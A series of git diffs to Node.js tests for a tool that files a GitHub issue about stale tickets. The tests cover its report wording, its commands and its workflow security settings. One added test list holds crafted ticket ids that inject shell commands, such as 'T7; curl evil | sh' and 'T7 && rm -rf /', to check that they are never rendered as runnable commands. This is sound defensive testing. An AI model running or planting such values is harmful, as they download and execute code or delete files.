+++ b/scripts/test/ceremony-drift-exit.test.mjs
@@ -25,6 +25,7 @@ import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
 import { spawnSync, execFileSync } from 'node:child_process';
 
+const REPO_ROOT = join(dirname(fileURLToPath(import.meta.url)), '..', '..');
 const SCRIPT = join(dirname(fileURLToPath(import.meta.url)), '..', 'ceremony-drift.mjs');
 const BOT = 'github-actions[bot]';
 
@@ -233,4 +234,68 @@ test('two marked issues fail closed rather than guessing which to overwrite', ()
     assert.match(r.stderr, /ambiguous tracking issue/);
     assert.doesNotMatch(r.calls, /issue close/);
   });
+});
+
+// ---- the documented command must not write outside the reported set ----
+//
+// The report is built from `needsCeremony`, which contains only rail-freezing and
+// preexisting-completed-field entries. `ticket-prune --ceremony --write` ALSO
+// tombstones rails-less stale tickets — which never appear in the report. An
+// operator running the advertised command on the strength of what the issue lists
+// would then complete a rails-less ticket that may still be in progress.
+//
+// This drives the EXACT command string the reporter renders, so the test fails if
+// someone reintroduces `--write` into it.
+
+function makeMixedRepo() {
+  const dir = mkdtempSync(join(tmpdir(), 'adlc-drift-mixed-'));
+  const g = (...args) => execFileSync('git', args, { cwd: dir, stdio: 'ignore' });
+  g('init', '-q', '.');
+  g('config', 'user.email', 'test@example.invalid');
+  g('config', 'user.name', 'test');
+  mkdirSync(join(dir, '.adlc'), { recursive: true });
+  mkdirSync(join(dir, 'packages', 'core'), { recursive: true });
+  mkdirSync(join(dir, 'packages', 'util'), { recursive: true });
+  writeFileSync(join(dir, 'packages', 'core', 'a.mjs'), 'export const a = 1;\n');
+  writeFileSync(join(dir, 'packages', 'util', 'b.mjs'), 'export const b = 2;\n');
+  writeFileSync(join(dir, '.adlc', 'tickets.json'), JSON.stringify({ tickets: [
+    // Rail-freezing and stale → appears in the report.
+    { id: 'RAILED', title: 'railed', scope: ['packages/core/**'], rails: ['packages/core/**'] },
+    // Rails-less; scope already resolves so it LOOKS stale, but it is in progress.
+    // It never appears in needsCeremony, so the report never mentions it.
+    { id: 'RAILLESS', title: 'rails-less in progress', scope: ['packages/util/**'] },
+  ] }));
+  g('add', '-A');
+  g('commit', '-m', 'fixture');
+  return dir;
+}
+
+const completedIds = (repo) =>
+  JSON.parse(readFileSync(join(repo, '.adlc', 'tickets.json'), 'utf8'))
+    .tickets.filter((t) => t.completed === true).map((t) => t.id).sort();
+
+test('the rendered command completes only the reported ticket, not rails-less ones', async () => {
+  const repo = makeMixedRepo();
+  try {
+    // Take the command straight out of the rendered issue body.
+    const { renderIssueBody } = await import('../ceremony-drift.mjs');
+    const body = renderIssueBody([
+      { id: 'RAILED', reason: 'inferred: scope resolves', rails: ['packages/core/**'], blocker: 'rails-freeze' },
+    ]);
+    const cmd = body.split('\n').map((l) => l.trim())
+      .find((l) => l.startsWith('ADLC_RAILS_BYPASS=1 adlc ticket-prune'));
+    assert.ok(cmd, 'the body should document a ceremony command');
+
+    const args = cmd.replace('ADLC_RAILS_BYPASS=1 adlc ticket-prune', '').trim().split(/\s+/)
+      .map((a) => (a === 'origin/main' ? 'HEAD' : a)); // fixture has no origin
+    const BIN = join(REPO_ROOT, 'packages', 'ticket-prune', 'bin', 'ticket-prune.mjs');
+    execFileSync(process.execPath, [BIN, ...args], {
+      cwd: repo, stdio: 'ignore', env: { ...process.env, ADLC_RAILS_BYPASS: '1' },
+    });
+
+    assert.deepEqual(completedIds(repo), ['RAILED'],
+      'the rails-less ticket must be untouched — it never appeared in the report');
+  } finally {
+    rmSync(repo, { recursive: true, force: true });
+  }
 });

--- a/scripts/test/ceremony-drift-workflow.test.mjs
+++ b/scripts/test/ceremony-drift-workflow.test.mjs
@@ -1,0 +1,75 @@
+// ceremony-drift-workflow.test.mjs — invariants of the drift workflow itself.
+//
+// The workflow file is the part of this feature nothing else can check: the
+// script's own tests cannot see how it is invoked, and a misconfigured trigger
+// or a leaked credential is invisible until it is exploited. Three properties
+// here are security- or correctness-critical and were each a real review
+// finding, so they get a committed regression test rather than a comment.
+//
+// Parsed as text with targeted assertions (no YAML dependency in this repo's
+// test tree); each assertion is anchored to a distinctive line so a reformat
+// does not silently pass.
+
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { join, dirname } from 'node:path';
+import { fileURLToPath } from 'node:url';
+
+const WF = readFileSync(
+  join(dirname(fileURLToPath(import.meta.url)), '..', '..', '.github', 'workflows', 'ceremony-drift.yml'),
+  'utf8'
+);
+
+// A job holding issues:write must not leave that credential where later steps —
+// above all dependency install scripts — can recover it from git config.
+test('checkout does not persist the job credential', () => {
+  assert.match(WF, /persist-credentials:\s*false/);
+});
+
+// This lockfile contains packages with install scripts. None are needed here,
+// and running them inside an issues:write job is an unnecessary supply-chain
+// path to a token that can rewrite and close issues.
+test('dependency install runs no lifecycle scripts', () => {
+  assert.match(WF, /npm ci --ignore-scripts/);
+  assert.doesNotMatch(WF, /run:\s*npm install\s*$/m);
+});
+
+// workflow_dispatch can be launched against any branch or tag. Without an
+// explicit ref, checkout takes the triggering one — so a dispatch from a feature
+// branch would compute drift from that branch's ticket store and then rewrite or
+// close the repository-wide tracker from a non-authoritative snapshot.
+test('checkout is pinned to main for every trigger', () => {
+  assert.match(WF, /ref:\s*main/);
+});
+
+// The ticket store read and the base ref compared against must be the SAME
+// snapshot. Pinning checkout to main and then passing origin/main separately
+// reintroduces the mixed-snapshot bug by another route.
+test('drift is computed against the checked-out snapshot', () => {
+  assert.match(WF, /BASE_REF:\s*HEAD/);
+  assert.doesNotMatch(WF, /BASE_REF:\s*origin\/main/);
+});
+
+// The whole design premise: an ordinary PR cannot clear this drift, so making it
+// a PR gate would block contributors on something none of them can fix.
+test('the workflow never runs on pull_request', () => {
+  assert.doesNotMatch(WF, /^\s*pull_request:/m);
+});
+
+// Least privilege: this job's only side effect is maintaining its issue.
+test('permissions are limited to reading contents and writing issues', () => {
+  assert.match(WF, /permissions:/);
+  assert.match(WF, /contents:\s*read/);
+  assert.match(WF, /issues:\s*write/);
+  for (const scope of ['packages:', 'id-token:', 'actions:', 'deployments:']) {
+    assert.doesNotMatch(WF, new RegExp(`^\\s*${scope}\\s*write`, 'm'), `unexpected ${scope} write`);
+  }
+});
+
+// push and schedule can overlap; without serialization each run could see "no
+// existing issue" and open its own duplicate.
+test('runs are serialized so overlapping triggers cannot duplicate the tracker', () => {
+  assert.match(WF, /concurrency:/);
+  assert.match(WF, /group:\s*ceremony-drift/);
+});

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -39,6 +39,18 @@ const DONE = [
 const RUNNABLE = 'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
 const offersCommand = (body) => body.split('\n').some((l) => l.trim() === RUNNABLE);
 
+// The report documents the ceremony as a PROCEDURE WITH PRECONDITIONS. It never
+// certifies it as safe, because it cannot: it renders a snapshot at commit A
+// while the command recomputes its own target set whenever the operator runs it,
+// and `.adlc/current-ticket.json` is gitignored so a CI checkout can never see
+// whether anything is in flight. These assert the report keeps saying so.
+const CERTIFICATION_CLAIMS = [
+  /safe to run as-is/,
+  /excluded from the command/,
+  /no bulk command is offered/,
+];
+const makesNoSafetyClaim = (body) => CERTIFICATION_CLAIMS.every((re) => !re.test(body));
+
 // ---- rendering ----
 
 test('body names every drifting ticket and its frozen rails', () => {
@@ -51,8 +63,8 @@ test('body names every drifting ticket and its frozen rails', () => {
 
 test('body carries the exact ceremony command for EXPLICITLY done tickets', () => {
   const body = renderIssueBody(DONE);
-  assert.ok(offersCommand(body), 'explicit-status drift should offer the runnable command');
-  assert.match(body, /## Confirmed shipped/);
+  assert.ok(offersCommand(body), 'the procedure documents the runnable command');
+  assert.match(body, /## Explicitly done/);
 });
 
 // The core safety property. `inferred:` means "every scope glob already resolves
@@ -60,29 +72,32 @@ test('body carries the exact ceremony command for EXPLICITLY done tickets', () =
 // work touches existing paths. Completing such a ticket expires its rails
 // mid-build, and an instruction in a bot-filed issue carries more apparent
 // authority than a CLI someone chose to run.
-test('heuristic-only drift is NEVER given the bulk completion command', () => {
+test('heuristic-only drift is sorted as unconfirmed and never certified', () => {
   const body = renderIssueBody(DRIFT);
-  assert.ok(!offersCommand(body), 'heuristic-only drift must not offer the command');
   assert.match(body, /## Needs confirmation before completing \(2\)/);
   assert.match(body, /cannot distinguish "finished" from "in progress on existing files"/);
+  assert.ok(makesNoSafetyClaim(body));
 });
 
-test('the ACTIVE ticket is quarantined out of every completion instruction', () => {
+test('the ACTIVE ticket is listed first, under its own warning', () => {
   const body = renderIssueBody([...DONE, ...DRIFT], { activeTicketId: 'T42' });
   assert.match(body, /## ⚠ Currently active — do NOT complete \(1\)/);
   const activeIdx = body.indexOf('Currently active');
-  const confirmedIdx = body.indexOf('## Confirmed shipped');
-  assert.ok(activeIdx < confirmedIdx, 'the warning must precede any command');
-  // T42 must not appear under the clearable heading.
-  const confirmedSection = body.slice(confirmedIdx, body.indexOf('## Needs confirmation'));
-  assert.doesNotMatch(confirmedSection, /T42/);
+  const doneIdx = body.indexOf('## Explicitly done');
+  assert.ok(activeIdx < doneIdx, 'the warning must precede the rest of the report');
+  // The active ticket is not double-listed under the done heading.
+  const doneSection = body.slice(doneIdx, body.indexOf('## Needs confirmation'));
+  assert.doesNotMatch(doneSection, /T42/);
   assert.match(body, /expire its rails while it is still being built/);
+  assert.ok(makesNoSafetyClaim(body));
 });
 
-test('an explicitly-done ticket that is ALSO active stays quarantined', () => {
+test('an explicitly-done ticket that is ALSO active is flagged, not silently cleared', () => {
   const body = renderIssueBody(DONE, { activeTicketId: 'T7' });
   assert.match(body, /## ⚠ Currently active/);
-  assert.doesNotMatch(body, /ticket-prune --ceremony/);
+  // It must NOT claim the command skips it — the command has no per-ticket filter.
+  assert.match(body, /including this one/);
+  assert.ok(makesNoSafetyClaim(body));
 });
 
 test('body embeds the discovery marker', () => {
@@ -116,17 +131,17 @@ test('body states the completion rule correctly', () => {
 const CONFIRMED = { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' };
 const HEURISTIC = { id: 'T9', reason: 'inferred: scope resolves', rails: ['b/**'], blocker: 'rails-freeze' };
 
-test('confirmed alongside UNCONFIRMED withholds the command', () => {
+test('mixed confirmed/unconfirmed states the blast radius rather than certifying', () => {
   const body = renderIssueBody([CONFIRMED, HEURISTIC]);
-  assert.ok(!offersCommand(body), 'command would also complete the unconfirmed ticket');
-  assert.match(body, /No bulk command is offered on this run/);
   assert.match(body, /no per-ticket filter/);
+  assert.ok(makesNoSafetyClaim(body));
 });
 
-test('confirmed alongside an ACTIVE ticket withholds the command', () => {
+test('an ACTIVE ticket is surfaced with an explicit do-not-complete warning', () => {
   const body = renderIssueBody([CONFIRMED, HEURISTIC], { activeTicketId: 'T9' });
-  assert.ok(!offersCommand(body), 'command would also complete the in-flight ticket');
   assert.match(body, /## ⚠ Currently active/);
+  assert.match(body, /expire its rails while it is still being built/);
+  assert.ok(makesNoSafetyClaim(body));
 });
 
 // The active section must not promise an exclusion the command cannot deliver.
@@ -135,15 +150,17 @@ test('the active-ticket warning never claims the command excludes it', () => {
   assert.doesNotMatch(body, /excluded from the command below/);
 });
 
-test('confirmed plus a manual-decision entry still offers the command', () => {
-  // preexisting-completed-field entries are not rails-freeze, so --ceremony
-  // leaves them alone; withholding here would be needlessly restrictive.
+test('confirmed plus a manual-decision entry still renders the procedure', () => {
   const manual = { id: 'T8', reason: 'explicit status: "done"', rails: [], blocker: 'preexisting-completed-field' };
-  assert.ok(offersCommand(renderIssueBody([CONFIRMED, manual])));
+  const body = renderIssueBody([CONFIRMED, manual]);
+  assert.ok(offersCommand(body));
+  assert.ok(makesNoSafetyClaim(body));
 });
 
-test('an unresolvable pointer withholds the command even when all are confirmed', () => {
-  assert.ok(!offersCommand(renderIssueBody([CONFIRMED], { activeTicketUnknown: true })));
+test('an unresolvable pointer sorts everything as unconfirmed', () => {
+  const body = renderIssueBody([CONFIRMED], { activeTicketUnknown: true });
+  assert.match(body, /## Needs confirmation before completing \(1\)/);
+  assert.doesNotMatch(body, /## Explicitly done/);
 });
 
 // ---- title ----
@@ -237,7 +254,7 @@ const MIXED = [
 
 test('body separates the two blockers into their own sections', () => {
   const body = renderIssueBody(MIXED);
-  assert.match(body, /## Confirmed shipped — clearable by the ceremony \(1\)/); // rails-freeze
+  assert.match(body, /## Explicitly done \(1\)/);                        // rails-freeze
   assert.match(body, /## Needs a manual decision \(1\)/);                       // preexisting-completed-field
 });
 
@@ -245,12 +262,10 @@ test('body separates the two blockers into their own sections', () => {
 // to overwrite a deliberately-set `completed` value. Promising it clears
 // everything would be instructions that never stop being wrong, on an issue that
 // can never close.
-test('the ceremony command is not advertised as clearing manual-decision entries', () => {
+test('manual-decision entries are documented as NOT cleared by the ceremony', () => {
   const body = renderIssueBody(MIXED);
   const manualIdx = body.indexOf('## Needs a manual decision');
-  const cmdIdx = body.indexOf('ticket-prune --ceremony');
-  assert.ok(cmdIdx !== -1 && manualIdx !== -1);
-  assert.ok(cmdIdx < manualIdx, 'ceremony command must sit in the clearable section, above it');
+  assert.ok(manualIdx !== -1);
   assert.match(body.slice(manualIdx), /will \*\*not\*\* clear them/);
 });
 
@@ -274,7 +289,7 @@ test('title does not claim rails are frozen', () => {
 test('unknown or missing evidence falls back to needs-confirmation, not clearable', () => {
   for (const reason of [undefined, '', 'r', 'some future reason string', null]) {
     const body = renderIssueBody([{ id: 'TX', reason, rails: ['a/**'], blocker: 'rails-freeze' }]);
-    assert.doesNotMatch(body, /ticket-prune --ceremony/, `reason ${JSON.stringify(reason)} must not be clearable`);
+    assert.doesNotMatch(body, /## Explicitly done/, `reason ${JSON.stringify(reason)} must not read as confirmed`);
     assert.match(body, /## Needs confirmation before completing \(1\)/);
   }
 });
@@ -283,10 +298,9 @@ test('unknown or missing evidence falls back to needs-confirmation, not clearabl
 // conflicting pointer is ok:false (#196's fail-closed contract). When it cannot
 // be resolved we do not know which ticket is in flight, so nothing may be
 // advertised as safe to bulk-complete — not even explicitly-done entries.
-test('an unresolvable active-ticket pointer suppresses the bulk command entirely', () => {
+test('an unresolvable active-ticket pointer downgrades every entry to unconfirmed', () => {
   const body = renderIssueBody(DONE, { activeTicketUnknown: true });
-  assert.doesNotMatch(body, /ticket-prune --ceremony/);
-  assert.doesNotMatch(body, /## Confirmed shipped/);
+  assert.doesNotMatch(body, /## Explicitly done/);
   assert.match(body, /## Needs confirmation before completing \(1\)/);
   assert.match(body, /active-ticket pointer could not be resolved/);
 });
@@ -294,7 +308,27 @@ test('an unresolvable active-ticket pointer suppresses the bulk command entirely
 test('decideAction threads the unknown-pointer state into the body', () => {
   const d = decideAction({ drift: DONE, existingIssue: null, activeTicketUnknown: true });
   assert.equal(d.action, 'open');
-  assert.doesNotMatch(d.body, /ticket-prune --ceremony/);
+  assert.doesNotMatch(d.body, /## Explicitly done/);
+});
+
+// The procedure section is the one place the command appears. It must always
+// disclose what CI cannot see, and always lead with the dry run.
+test('the procedure discloses the CI blind spots and leads with a dry run', () => {
+  const body = renderIssueBody(DRIFT);
+  assert.ok(offersCommand(body), 'the procedure documents the command');
+  assert.match(body, /cannot tell you it is safe to run the command/);
+  assert.match(body, /gitignored/);                       // the place blind spot
+  assert.match(body, /re-computes its own target set/);   // the time blind spot
+  const dryIdx = body.indexOf('# dry run');
+  assert.ok(dryIdx !== -1 && dryIdx < body.indexOf(RUNNABLE), 'dry run must come first');
+  assert.ok(makesNoSafetyClaim(body));
+});
+
+test('a drift set with nothing rail-freezing renders no procedure at all', () => {
+  const manualOnly = [{ id: 'T8', reason: 'explicit status: "done"', rails: [], blocker: 'preexisting-completed-field' }];
+  const body = renderIssueBody(manualOnly);
+  assert.doesNotMatch(body, /## Clearing these/);
+  assert.ok(!offersCommand(body));
 });
 
 // ---- decisions ----

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -391,3 +391,30 @@ test('decideAction never throws on a malformed drift entry', () => {
   assert.equal(d.action, 'open');
   assert.match(d.body, /T1/);
 });
+
+// ---- backend compatibility ----
+//
+// `ticket-prune --ceremony` is not implemented for the directory ticket store
+// (run.mjs returns "not supported for the directory ticket store yet"). Publishing
+// the command to a repo on that backend would send an operator to a deterministic
+// error and leave the rails frozen, so the remedy is backend-specific.
+
+test('a directory-store repo gets a manual remedy, not the unusable command', () => {
+  const body = renderIssueBody(DRIFT, { ceremonySupported: false });
+  assert.ok(!offersCommand(body), 'the ceremony command does not work on this backend');
+  assert.match(body, /not supported for the directory ticket store/);
+  assert.match(body, /add `completed: true` to each ticket/);
+});
+
+test('a tickets.json repo still gets the command', () => {
+  assert.ok(offersCommand(renderIssueBody(DRIFT, { ceremonySupported: true })));
+});
+
+test('backend support defaults to the tickets.json behaviour', () => {
+  assert.equal(renderIssueBody(DRIFT), renderIssueBody(DRIFT, { ceremonySupported: true }));
+});
+
+test('decideAction threads the backend through to the body', () => {
+  const d = decideAction({ drift: DRIFT, existingIssue: null, ceremonySupported: false });
+  assert.ok(!offersCommand(d.body));
+});

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -61,9 +61,9 @@ test('body states the completion rule correctly', () => {
 // ---- title ----
 
 test('title is singular for one ticket and plural otherwise', () => {
-  assert.match(renderIssueTitle([{ id: 'T1' }]), /1 shipped ticket still/);
-  assert.match(renderIssueTitle([{ id: 'T1' }, { id: 'T2' }]), /2 shipped tickets still/);
-  assert.match(renderIssueTitle([]), /0 shipped tickets still/);
+  assert.match(renderIssueTitle([{ id: "T1" }]), /1 shipped ticket awaiting/);
+  assert.match(renderIssueTitle([{ id: "T1" }, { id: "T2" }]), /2 shipped tickets awaiting/);
+  assert.match(renderIssueTitle([]), /0 shipped tickets awaiting/);
 });
 
 // ---- issue discovery ----
@@ -103,14 +103,45 @@ test('body is stable regardless of input order (idempotence depends on this)', (
   assert.equal(renderIssueBody(DRIFT), renderIssueBody([...DRIFT].reverse()));
 });
 
-test('body distinguishes the two blocker kinds', () => {
-  const mixed = [
-    { id: 'T1', reason: 'r', rails: ['a/**'], blocker: 'rails-freeze' },
-    { id: 'T2', reason: 'r', rails: ['b/**'], blocker: 'preexisting-completed-field' },
-  ];
-  const body = renderIssueBody(mixed);
-  assert.match(body, /rails-freeze/);
-  assert.match(body, /preexisting-completed-field/);
+// Fixture note: a 'preexisting-completed-field' entry ALWAYS has `rails: []` —
+// ceremonyDisposition() checks non-empty rails first and classifies those as
+// 'rails-freeze'. An earlier version of this test gave it rails, asserting
+// against a state the producer cannot emit.
+const MIXED = [
+  { id: 'T1', reason: 'r', rails: ['a/**'], blocker: 'rails-freeze' },
+  { id: 'T2', reason: 'r', rails: [], blocker: 'preexisting-completed-field' },
+];
+
+test('body separates the two blockers into their own sections', () => {
+  const body = renderIssueBody(MIXED);
+  assert.match(body, /## Clearable by the ceremony \(1\)/);
+  assert.match(body, /## Needs a manual decision \(1\)/);
+});
+
+// The advertised command completes ONLY rails-freeze entries; --ceremony refuses
+// to overwrite a deliberately-set `completed` value. Promising it clears
+// everything would be instructions that never stop being wrong, on an issue that
+// can never close.
+test('the ceremony command is not advertised as clearing manual-decision entries', () => {
+  const body = renderIssueBody(MIXED);
+  const manualIdx = body.indexOf('## Needs a manual decision');
+  const cmdIdx = body.indexOf('ticket-prune --ceremony');
+  assert.ok(cmdIdx !== -1 && manualIdx !== -1);
+  assert.ok(cmdIdx < manualIdx, 'ceremony command must sit in the clearable section, above it');
+  assert.match(body.slice(manualIdx), /will \*\*not\*\* clear them/);
+});
+
+test('a drift set of only manual-decision entries advertises no ceremony command', () => {
+  const body = renderIssueBody([MIXED[1]]);
+  assert.doesNotMatch(body, /ticket-prune --ceremony/);
+  assert.match(body, /## Needs a manual decision \(1\)/);
+});
+
+// 'preexisting-completed-field' entries always have empty rails, so a title
+// asserting everything is "freezing rails" would be false whenever one appears.
+test('title does not claim rails are frozen', () => {
+  assert.doesNotMatch(renderIssueTitle(MIXED), /freezing rails/);
+  assert.match(renderIssueTitle(MIXED), /2 shipped tickets awaiting completion/);
 });
 
 // ---- decisions ----

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -11,7 +11,13 @@
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { renderIssueBody, decideAction, MARKER } from '../ceremony-drift.mjs';
+import {
+  renderIssueBody,
+  renderIssueTitle,
+  decideAction,
+  selectTrackingIssue,
+  MARKER,
+} from '../ceremony-drift.mjs';
 
 const DRIFT = [
   { id: 'T9', reason: 'inferred: all 6 declared scope glob(s) resolve to tracked files', rails: ['packages/ticket-sync/lib/schema.mjs'], blocker: 'rails-freeze' },
@@ -35,6 +41,60 @@ test('body carries the exact ceremony command an operator must run', () => {
 
 test('body embeds the discovery marker', () => {
   assert.ok(renderIssueBody(DRIFT).includes(MARKER));
+});
+
+// The marker is only useful if GitHub actually hides it. A malformed marker
+// still "matches" itself — every test comparing against the constant passes —
+// while rendering as visible junk at the top of the issue.
+test('marker is a well-formed HTML comment (renders invisibly)', () => {
+  assert.match(MARKER, /^<!--.*-->$/);
+});
+
+// This line is the operator-facing statement of the T36 rule. Inverted, it is
+// not a typo — it is wrong instructions in the one place someone reads them.
+test('body states the completion rule correctly', () => {
+  const body = renderIssueBody(DRIFT);
+  assert.match(body, /marked `completed: true`/);
+  assert.doesNotMatch(body, /marked `completed: false`/);
+});
+
+// ---- title ----
+
+test('title is singular for one ticket and plural otherwise', () => {
+  assert.match(renderIssueTitle([{ id: 'T1' }]), /1 shipped ticket still/);
+  assert.match(renderIssueTitle([{ id: 'T1' }, { id: 'T2' }]), /2 shipped tickets still/);
+  assert.match(renderIssueTitle([]), /0 shipped tickets still/);
+});
+
+// ---- issue discovery ----
+//
+// If this ever stops matching an issue that exists, the job opens a DUPLICATE on
+// every run — the exact churn idempotence exists to prevent. It lived in the gh
+// I/O shell and was untested until mutation testing surfaced it.
+
+test('selectTrackingIssue finds the issue carrying the marker', () => {
+  const found = selectTrackingIssue([
+    { number: 1, body: 'unrelated issue' },
+    { number: 2, body: `${MARKER}\n\nthe tracking issue` },
+  ]);
+  assert.equal(found.number, 2);
+});
+
+test('selectTrackingIssue returns null when no issue carries the marker', () => {
+  assert.equal(selectTrackingIssue([{ number: 1, body: 'unrelated' }]), null);
+  assert.equal(selectTrackingIssue([]), null);
+  assert.equal(selectTrackingIssue(null), null);
+});
+
+test('selectTrackingIssue tolerates missing/non-string bodies without throwing', () => {
+  const found = selectTrackingIssue([
+    { number: 1 },
+    { number: 2, body: null },
+    { number: 3, body: 42 },
+    null,
+    { number: 4, body: `${MARKER} here` },
+  ]);
+  assert.equal(found.number, 4);
 });
 
 // Ordering must not depend on the order runTicketPrune happens to emit, or the

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -32,6 +32,13 @@ const DONE = [
   { id: 'T7', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
 ];
 
+// Asserting on /ticket-prune --ceremony/ is NOT sufficient: the body also
+// MENTIONS the command in prose explaining why it is being withheld. A substring
+// check would then read "the command is offered" from text saying the opposite.
+// This looks for the runnable line inside the fenced block.
+const RUNNABLE = 'ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin/main';
+const offersCommand = (body) => body.split('\n').some((l) => l.trim() === RUNNABLE);
+
 // ---- rendering ----
 
 test('body names every drifting ticket and its frozen rails', () => {
@@ -44,7 +51,7 @@ test('body names every drifting ticket and its frozen rails', () => {
 
 test('body carries the exact ceremony command for EXPLICITLY done tickets', () => {
   const body = renderIssueBody(DONE);
-  assert.match(body, /ADLC_RAILS_BYPASS=1 adlc ticket-prune --ceremony --write --base-ref origin\/main/);
+  assert.ok(offersCommand(body), 'explicit-status drift should offer the runnable command');
   assert.match(body, /## Confirmed shipped/);
 });
 
@@ -55,7 +62,7 @@ test('body carries the exact ceremony command for EXPLICITLY done tickets', () =
 // authority than a CLI someone chose to run.
 test('heuristic-only drift is NEVER given the bulk completion command', () => {
   const body = renderIssueBody(DRIFT);
-  assert.doesNotMatch(body, /ticket-prune --ceremony/);
+  assert.ok(!offersCommand(body), 'heuristic-only drift must not offer the command');
   assert.match(body, /## Needs confirmation before completing \(2\)/);
   assert.match(body, /cannot distinguish "finished" from "in progress on existing files"/);
 });
@@ -95,6 +102,48 @@ test('body states the completion rule correctly', () => {
   const body = renderIssueBody(DONE);
   assert.match(body, /marked `completed: true`/);
   assert.doesNotMatch(body, /marked `completed: false`/);
+});
+
+// ---- the bulk command's blast radius ----
+//
+// `ticket-prune --ceremony` has NO per-ticket filter: it completes every stale
+// rail-freezing ticket. Splitting the report into sections partitions the
+// DISPLAY only. Rendering the command next to an "excluded" entry would be a
+// false safety claim an operator acts on — completing in-flight work and
+// expiring its rails. So the command appears only when EVERY rail-freezing entry
+// is confirmed done.
+
+const CONFIRMED = { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' };
+const HEURISTIC = { id: 'T9', reason: 'inferred: scope resolves', rails: ['b/**'], blocker: 'rails-freeze' };
+
+test('confirmed alongside UNCONFIRMED withholds the command', () => {
+  const body = renderIssueBody([CONFIRMED, HEURISTIC]);
+  assert.ok(!offersCommand(body), 'command would also complete the unconfirmed ticket');
+  assert.match(body, /No bulk command is offered on this run/);
+  assert.match(body, /no per-ticket filter/);
+});
+
+test('confirmed alongside an ACTIVE ticket withholds the command', () => {
+  const body = renderIssueBody([CONFIRMED, HEURISTIC], { activeTicketId: 'T9' });
+  assert.ok(!offersCommand(body), 'command would also complete the in-flight ticket');
+  assert.match(body, /## ⚠ Currently active/);
+});
+
+// The active section must not promise an exclusion the command cannot deliver.
+test('the active-ticket warning never claims the command excludes it', () => {
+  const body = renderIssueBody([CONFIRMED, HEURISTIC], { activeTicketId: 'T9' });
+  assert.doesNotMatch(body, /excluded from the command below/);
+});
+
+test('confirmed plus a manual-decision entry still offers the command', () => {
+  // preexisting-completed-field entries are not rails-freeze, so --ceremony
+  // leaves them alone; withholding here would be needlessly restrictive.
+  const manual = { id: 'T8', reason: 'explicit status: "done"', rails: [], blocker: 'preexisting-completed-field' };
+  assert.ok(offersCommand(renderIssueBody([CONFIRMED, manual])));
+});
+
+test('an unresolvable pointer withholds the command even when all are confirmed', () => {
+  assert.ok(!offersCommand(renderIssueBody([CONFIRMED], { activeTicketUnknown: true })));
 });
 
 // ---- title ----

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -41,7 +41,7 @@ const readyCommandIds = (body) =>
   body
     .split('\n')
     .map((l) => l.trim())
-    .map((l) => l.match(/^adlc-tickets complete (\S+) --write --authorize$/))
+    .map((l) => l.match(/^adlc-tickets complete (\S+) --write --authorize --json$/))
     .filter(Boolean)
     .map((m) => m[1]);
 const offersCommand = (body) => readyCommandIds(body).length > 0;
@@ -455,4 +455,49 @@ test('the completion command records evidence and uses the transaction (document
   const body = renderIssueBody(DONE);
   assert.match(body, /\.adlc\/manifest\.jsonl/, 'the body tells the operator evidence is recorded');
   assert.match(body, /transaction/);
+});
+
+// ---- ticket ids are interpolated into shell; treat them as untrusted ----
+//
+// A ticket id comes from the repo (a merged ticket) and is rendered into a
+// copy-paste command in a bot-authored issue. The store validator accepts
+// arbitrary strings, so a crafted id would be executable shell for an admin.
+// Only ids matching `[A-Za-z0-9._-]` are rendered as commands; the rest are
+// surfaced without one. No metacharacter survives the gate, so injection is
+// structurally impossible rather than quoted-and-hoped.
+const SHELL_INJECTION_IDS = [
+  'T7; curl evil | sh',
+  'T7 && rm -rf /',
+  'T7$(whoami)',
+  'T7`id`',
+  'T7\nrm -rf x',
+  '$(touch pwned)',
+  '--authorize',        // an id that is itself a flag
+  'a b',                // whitespace
+  "T7'",                // quote
+];
+
+for (const id of SHELL_INJECTION_IDS) {
+  test(`a malicious ticket id (${JSON.stringify(id).slice(0, 24)}) is never rendered as a command`, () => {
+    const body = renderIssueBody([{ id, reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
+    // No runnable adlc-tickets line carries the raw id.
+    assert.ok(!body.split('\n').some((l) => l.trim().startsWith('adlc-tickets complete') && l.includes(id)),
+      'the raw id must not appear in a runnable command');
+    // It is surfaced as unsafe instead, not silently dropped.
+    assert.match(body, /cannot be safely/);
+  });
+}
+
+test('a safe id is rendered with --json (which suppresses interactive migration)', () => {
+  const body = renderIssueBody([{ id: 'T-CC1', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' }]);
+  assert.match(body, /adlc-tickets complete T-CC1 --write --authorize --json/);
+});
+
+test('a mix of safe and unsafe ids renders the safe one and flags the unsafe one', () => {
+  const body = renderIssueBody([
+    { id: 'T7', reason: 'explicit status: "done"', rails: ['a/**'], blocker: 'rails-freeze' },
+    { id: 'T7; rm -rf /', reason: 'explicit status: "done"', rails: ['b/**'], blocker: 'rails-freeze' },
+  ]);
+  assert.deepEqual(readyCommandIds(body), ['T7']);
+  assert.match(body, /cannot be safely/);
 });

--- a/scripts/test/ceremony-drift.test.mjs
+++ b/scripts/test/ceremony-drift.test.mjs
@@ -32,7 +32,7 @@ const DONE = [
   { id: 'T7', reason: 'explicit status: "done"', rails: ['packages/core/**'], blocker: 'rails-freeze' },
 ];
 
-// The remedy is a PER-TICKET canonical completion: `adlc-tickets complete <id>
+// The remedy is a PER-TICKET canonical completion: `adlc ticket complete <id>
 // --write --authorize`. A ready command is a fenced line naming a SPECIFIC id —
